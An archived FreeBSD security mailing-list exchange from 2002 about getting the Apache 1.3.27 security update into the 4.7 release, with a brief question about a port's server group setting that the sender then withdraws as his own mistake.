Oct 04, 2002 at 10:19:14AM -0400, Mike Tancsa wrote: > > > > Will there be time to update 4.7R to include Apache 1.3.27 ? There are a > > number of security issues fixed in this rev. (see http://httpd.apache.org/) > >Yes. Hi, Thanks for the commit. One question, is the gid supposed to be nogroup, or www ? HAS_CONFIGURE= yes CONFIGURE_ARGS= \ --prefix=${PREFIX} \ --server-gid=nogroup \ ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Oct 5 5:53: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9664837B401; Sat, 5 Oct 2002 05:53:03 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id ADC5E43E65; Sat, 5 Oct 2002 05:53:02 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.6/8.12.6) with ESMTP id g95Cr0fV012262; Sat, 5 Oct 2002 08:53:01 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20021005085022.03ace218@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sat, 05 Oct 2002 08:51:04 -0400 To: kris@FreeBSD.ORG From: Mike Tancsa Subject: Re: still time for apache security fix ? Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG, re@FreeBSD.ORG In-Reply-To: <5.1.0.14.0.20021005084558.062ddb78@192.168.0.12> References: <20021004161755.GB24842@xor.obsecurity.org> <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> <5.1.1.6.0.20021004101636.04870680@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:46 AM 10/5/2002 -0400, Mike Tancsa wrote: >Hi, > Thanks for the commit. One question, is the gid supposed to be > nogroup, or www ? >HAS_CONFIGURE= yes >CONFIGURE_ARGS= \ > --prefix=${PREFIX} \ > --server-gid=nogroup \ Whoops, sorry for the noise. My mistake. I was looking at the old apache13-ssl, not apache13-modssl directory. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message